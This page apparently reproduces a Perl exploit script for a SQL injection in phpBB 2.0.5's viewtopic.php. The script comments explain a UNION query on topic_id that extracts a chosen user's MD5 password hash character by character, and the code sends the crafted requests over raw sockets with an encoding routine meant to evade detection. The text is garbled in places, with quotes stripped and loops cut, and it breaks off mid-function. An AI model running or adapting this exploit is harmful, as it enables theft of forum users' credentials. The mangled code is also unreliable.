Phpbb 2.0.5 Sql Injection Password, disclosure Exploit

Phpbb 2.0.5 Sql Injection Password, disclosure Exploit #!/usr/bin/perl -w # # # phpBB password disclosure vuln. # - rick patel # # There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id # which gets passed directly to sql server in query. Attacker could pass a special sql string which # can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with # autologin or cracked using john. # # Details: # # this is checking done for $topic_id in viewtopic.php: # # if ( isset($HTTP_GET_VARS[POST_TOPIC_URL])...
Nội dung trích xuất từ tài liệu:
Phpbb 2.0.5 Sql Injection Password, disclosure ExploitPhpbb 2.0.5 Sql Injection Password, disclosure Exploit#!/usr/bin/perl -w### phpBB password disclosure vuln.# - rick patel## There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id# which gets passed directly to sql server in query. Attacker could pass a special sql string which# can used to see md5 password hash for any user (!) for phpBB. This pass can be later usedwith# autologin or cracked using john.## Details:## this is checking done for $topic_id in viewtopic.php:## if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )#{# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);#}# else if ( isset($HTTP_GET_VARS[topic]) )#{# $topic_id = intval($HTTP_GET_VARS[topic]);#}## ok... no else statement at end# now if GET[view]=newest and GET[sid] is set, this query gets executed:## $sql = SELECT p.post_id# FROM . POSTS_TABLE . p, . SESSIONS_TABLE . s, . USERS_TABLE . u# WHERE s.session_id = $session_id# AND u.user_id = s.session_user_id# AND p.topic_id = $topic_id# AND p.post_time >= u.user_lastvisit# ORDER BY p.post_time ASC# LIMIT 1;## $topic_id gets passed directy to query. So how can we use this to do something important?Well# I decided to use union and create a second query will get us something useful. There werecouple of# problems i ran into. first, phpBB only cares about the first row returned. second, the select forfirst# query is p.post_id which is int, so int becomes the type returned for any other query in union.third,# there is rest of junk at end AND p.post_time >= ... We tell mysql to ignore that by placing/* at end# of our injected query. So what query can we make that returns only int?# this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id =$uid# Then all we have to do is query 32 times which $index from 1-32 and we get ord value of allchars of# md5 hash password.## I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so youwould have to tweak# the query to do anything useful.## This script is for educational purpose only. Please dont use it to do anything else.## To Fix this bug : http://www.phpbb.com/phpBB/viewtopic.php?t=112052use IO::Socket;$remote = shift || localhost;$view_topic = shift || /phpBB2/viewtopic.php;$uid = shift || 2;$port = 80;$dbtype = mysql4; # mysql4 or pgsqlprint Trying to get password hash for uid $uid server $remote dbtype: $dbtype \n;$p = ;for($index=1; $indexnew(PeerAddr => $remote,PeerPort => $port,Proto => tcp,Type => SOCK_STREAM)or die Couldnt connect to $remote:$port : $@\n;$str = GET $view_topic . ?sid=1&topic_id=-1 . random_encode(make_dbsql()) .&view=newest . HTTP/1.0\n\n;print $socket $str;print $socket Cookie: phpBB2mysql_sid=1\n; # replace this for pgsql or remove itprint $socket Host: $remote\n\n;while ($answer = ){if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location:viewtopic.php?p=#{$p .= chr ($1);}}close($socket);}print \nMD5 Hash for uid $uid is $p\n;# random encode str. helps avoid detectionsub random_encode{$str = shift;$ret = ;for($i=0; $i